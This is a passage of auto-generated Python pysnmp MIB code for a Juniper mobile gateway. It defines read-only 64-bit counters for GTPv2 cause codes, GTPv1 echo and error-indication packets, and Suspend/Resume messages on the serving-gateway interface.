jnxMbgSgwIfGtpV2ICsUnabPageUETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 150), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnabPageUETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnabPageUETx.setDescription('Number of GTP packets sent with cause Unable to Page UE.')
jnxMbgSgwIfGtpV2ICsNoMemRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 151), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoMemRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoMemRx.setDescription('Number of GTPV2 packets received with cause No Memory.')
jnxMbgSgwIfGtpV2ICsNoMemTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 152), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoMemTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsNoMemTx.setDescription('Number of GTP packets sent with cause No Memory.')
jnxMbgSgwIfGtpV2ICsUserAUTHFlRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 153), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUserAUTHFlRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUserAUTHFlRx.setDescription('Number of GTPV2 packets received with cause User AUTH Failed.')
jnxMbgSgwIfGtpV2ICsUserAUTHFlTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 154), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUserAUTHFlTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUserAUTHFlTx.setDescription('Number of GTP packets sent with cause User AUTH Failed.')
jnxMbgSgwIfGtpV2ICsAPNAcsDenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 155), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNAcsDenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNAcsDenRx.setDescription('Number of GTPV2 packets received with cause APN Access Denied.')
jnxMbgSgwIfGtpV2ICsAPNAcsDenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 156), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNAcsDenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNAcsDenTx.setDescription('Number of GTP packets sent with cause APN Access Denied.')
jnxMbgSgwIfGtpV2ICsReqRejRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 157), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqRejRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqRejRx.setDescription('Number of GTPV2 packets received with cause Request Rejected.')
jnxMbgSgwIfGtpV2ICsReqRejTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 158), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqRejTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsReqRejTx.setDescription('Number of GTP packets sent with cause Request Rejected.')
# NOTE(review): the Tx description below lacks a trailing period in the
# source MIB text; kept verbatim.
jnxMbgSgwIfGtpV2ICsPTMSISigMMRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 159), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTMSISigMMRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTMSISigMMRx.setDescription('Number of GTPV2 packets received with cause P-TMSI Signature Mismatch.')
jnxMbgSgwIfGtpV2ICsPTMSISigMMTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 160), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTMSISigMMTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsPTMSISigMMTx.setDescription('Number of GTP packets sent with cause P-TMSI Signature Mismatch')
jnxMbgSgwIfGtpV2ICsIMSINotKnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 161), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsIMSINotKnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsIMSINotKnRx.setDescription('Number of GTPV2 packets received with cause IMSI Not Known.')
jnxMbgSgwIfGtpV2ICsIMSINotKnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 162), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsIMSINotKnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsIMSINotKnTx.setDescription('Number of GTP packets sent with cause IMSI Not Known.')
jnxMbgSgwIfGtpV2ICsCondIEMsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 163), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCondIEMsRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCondIEMsRx.setDescription('Number of GTPV2 packets received with cause Conditional IE Missing.')
jnxMbgSgwIfGtpV2ICsCondIEMsTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 164), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCondIEMsTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCondIEMsTx.setDescription('Number of GTP packets sent with cause Conditional IE Missing.')
jnxMbgSgwIfGtpV2ICsAPNResTIncRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 165), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNResTIncRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNResTIncRx.setDescription('Number of GTPV2 packets received with cause APN Restriction Type Incompatible.')
jnxMbgSgwIfGtpV2ICsAPNResTIncTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 166), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNResTIncTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsAPNResTIncTx.setDescription('Number of GTP packets sent with cause APN Restriction Type Incompatible.')
jnxMbgSgwIfGtpV2ICsUnknownRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 167), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnknownRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnknownRx.setDescription('Number of GTPV2 packets received with cause Unknown.')
jnxMbgSgwIfGtpV2ICsUnknownTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 168), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnknownTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnknownTx.setDescription('Number of GTP packets sent with cause Unknown.')
jnxMbgSgwIfGtpV2ICsLclDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 169), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsLclDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsLclDetRx.setDescription('Number of GTP packets received with cause Local Detach.')
jnxMbgSgwIfGtpV2ICsLclDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 170), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsLclDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsLclDetTx.setDescription('Number of GTP packets sent with cause Local Detach.')
jnxMbgSgwIfGtpV2ICsCmpDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 171), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCmpDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCmpDetRx.setDescription('Number of GTP packets received with cause Complete Detach.')
jnxMbgSgwIfGtpV2ICsCmpDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 172), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCmpDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsCmpDetTx.setDescription('Number of GTP packets sent with cause Complete Detach.')
jnxMbgSgwIfGtpV2ICsRATChgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 173), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRATChgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRATChgRx.setDescription('Number of GTP packets received with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwIfGtpV2ICsRATChgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 174), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRATChgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRATChgTx.setDescription('Number of GTP packets sent with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwIfGtpV2ICsISRDeactRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 175), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsISRDeactRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsISRDeactRx.setDescription('Number of GTP packets received with cause ISR Deactivated.')
jnxMbgSgwIfGtpV2ICsISRDeactTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 176), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsISRDeactTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsISRDeactTx.setDescription('Number of GTP packets sent with cause ISR Deactivated.')
jnxMbgSgwIfGtpV2ICsEIFRNCEnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 177), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsEIFRNCEnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsEIFRNCEnRx.setDescription('Number of GTP packets received with cause Error Indication from RNC eNodeB.')
jnxMbgSgwIfGtpV2ICsEIFRNCEnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 178), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsEIFRNCEnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsEIFRNCEnTx.setDescription('Number of GTP packets sent with cause Error Indication from RNC eNodeB.')
jnxMbgSgwIfGtpV2ICsSemErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 179), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSemErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSemErTADRx.setDescription('Number of GTP packets received with cause Semantic Error in TAD Operation.')
jnxMbgSgwIfGtpV2ICsSemErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 180), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSemErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSemErTADTx.setDescription('Number of GTP packets sent with cause Semantic Error in TAD Operation.')
jnxMbgSgwIfGtpV2ICsSynErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 181), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSynErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSynErTADRx.setDescription('Number of GTP packets received with cause Syntactic Error in TAD Operation.')
jnxMbgSgwIfGtpV2ICsSynErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 182), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSynErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsSynErTADTx.setDescription('Number of GTP packets sent with cause Syntactic Error in TAD Operation.')
jnxMbgSgwIfGtpV2ICsRMValRcvRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 183), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRMValRcvRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRMValRcvRx.setDescription('Number of GTP packets received with cause Reserved Message Value Received.')
jnxMbgSgwIfGtpV2ICsRMValRcvTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 184), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRMValRcvTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRMValRcvTx.setDescription('Number of GTP packets sent with cause Reserved Message Value Received.')
jnxMbgSgwIfGtpV2ICsRPrNtRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 185), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRPrNtRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRPrNtRspRx.setDescription('Number of GTP packets received with cause Remote peer not responding.')
jnxMbgSgwIfGtpV2ICsRPrNtRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 186), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRPrNtRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsRPrNtRspTx.setDescription('Number of GTP packets sent with cause Remote peer not responding.')
jnxMbgSgwIfGtpV2ICsColNWReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 187), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsColNWReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsColNWReqRx.setDescription('Number of GTP packets received with cause Collision with network initiated request.')
jnxMbgSgwIfGtpV2ICsColNWReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 188), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsColNWReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsColNWReqTx.setDescription('Number of GTP packets sent with cause Collision with network initiated request.')
jnxMbgSgwIfGtpV2ICsUnPgUESusRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 189), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnPgUESusRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnPgUESusRx.setDescription('Number of GTP packets received with cause Unable to page UE due to suspension.')
jnxMbgSgwIfGtpV2ICsUnPgUESusTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 190), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnPgUESusTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsUnPgUESusTx.setDescription('Number of GTP packets sent with cause Unable to page UE due to suspension.')
jnxMbgSgwIfGtpV2ICsInvTotLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 191), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvTotLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvTotLenRx.setDescription('Number of GTP packets received with cause Invalid total len.')
jnxMbgSgwIfGtpV2ICsInvTotLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 192), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvTotLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvTotLenTx.setDescription('Number of GTP packets sent with cause Invalid total len.')
jnxMbgSgwIfGtpV2ICsDtForNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 193), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDtForNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDtForNtSupRx.setDescription('Number of GTP packets received with cause Data forwarding not supported.')
jnxMbgSgwIfGtpV2ICsDtForNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 194), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDtForNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsDtForNtSupTx.setDescription('Number of GTP packets sent with cause Data forwarding not supported.')
jnxMbgSgwIfGtpV2ICsInReFRePrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 195), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInReFRePrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInReFRePrRx.setDescription('Number of GTP packets received with cause Invalid Reply from Remote peer.')
jnxMbgSgwIfGtpV2ICsInReFRePrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 196), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInReFRePrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInReFRePrTx.setDescription('Number of GTP packets sent with cause Invalid Reply from Remote peer.')
jnxMbgSgwIfGtpV2ICsInvPrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 197), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvPrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvPrRx.setDescription('Number of GTP packets received with cause Invalid peer.')
jnxMbgSgwIfGtpV2ICsInvPrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 198), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvPrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV2ICsInvPrTx.setDescription('Number of GTP packets sent with cause Invalid peer.')
# GTPv1-specific counters: protocol errors, unsupported messages, T3 timer
# expiries, end markers, echo request/response, and error indications.
jnxMbgSgwIfGtpV1ProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 199), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ProtocolErrRx.setDescription('Number of GTPv1 Protocol Errors Received.')
jnxMbgSgwIfGtpV1UnSupMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 200), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1UnSupMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1UnSupMsgRx.setDescription('Number of GTPv1 Unsupported Messages received.')
jnxMbgSgwIfGtpV1T3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 201), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1T3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1T3RespTmrExpRx.setDescription('Number of GTP V1 T3 timer expiries Received.')
jnxMbgSgwIfGtpV1EndMarkerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 202), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EndMarkerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EndMarkerRx.setDescription('Number of GTP V1 end marker packets received.')
jnxMbgSgwIfGtpV1EndMarkerTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 203), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EndMarkerTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EndMarkerTx.setDescription('Number of GTP V1 end marker packets sent.')
jnxMbgSgwIfGtpV1EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 204), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoReqRx.setDescription('Number of GTP V1 echo request packets received.')
jnxMbgSgwIfGtpV1EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 205), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoReqTx.setDescription('Number of GTP V1 echo request packets sent.')
jnxMbgSgwIfGtpV1EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 206), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoRespRx.setDescription('Number of GTP V1 echo response packets received.')
jnxMbgSgwIfGtpV1EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 207), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1EchoRespTx.setDescription('Number of GTP V1 echo response packets sent.')
jnxMbgSgwIfGtpV1ErrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 208), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ErrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ErrIndRx.setDescription('Number of GTP packets V1 Error Indication packets received.')
jnxMbgSgwIfGtpV1ErrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 209), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ErrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfGtpV1ErrIndTx.setDescription('Number of GTP packets V1 Error Indication packets sent.')
# GTPv2 Suspend/Resume notification and acknowledgement message counters.
jnxMbgSgwIfSuspNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 210), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfSuspNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfSuspNotifRx.setDescription('Number of GTPv2 Suspend Notification messages received.')
jnxMbgSgwIfSuspNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 211), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfSuspNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfSuspNotifTx.setDescription('Number of GTPv2 Suspend Notification messages sent.')
jnxMbgSgwIfSuspAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 212), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfSuspAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfSuspAckRx.setDescription('Number of GTPv2 Suspend Acknowledgement messages received.')
jnxMbgSgwIfSuspAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 213), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfSuspAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfSuspAckTx.setDescription('Number of GTPv2 Suspend Acknowledgement messages sent.')
jnxMbgSgwIfResumeNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 214), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfResumeNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfResumeNotifRx.setDescription('Number of GTPv2 Resume Notification messages received.')
jnxMbgSgwIfResumeNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 215), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfResumeNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfResumeNotifTx.setDescription('Number of GTPv2 Resume Notification messages sent.')
jnxMbgSgwIfResumeAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 216), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfResumeAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfResumeAckRx.setDescription('Number of GTPv2 Resume Acknowledgement messages received.')
jnxMbgSgwIfResumeAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 217), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfResumeAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIfResumeAckTx.setDescription('Number of GTPv2 Resume Acknowledgement messages sent.')
jnxMbgSgwIfPiggybackMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 4, 1, 218), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIfPiggybackMsgRx.setStatus('current')
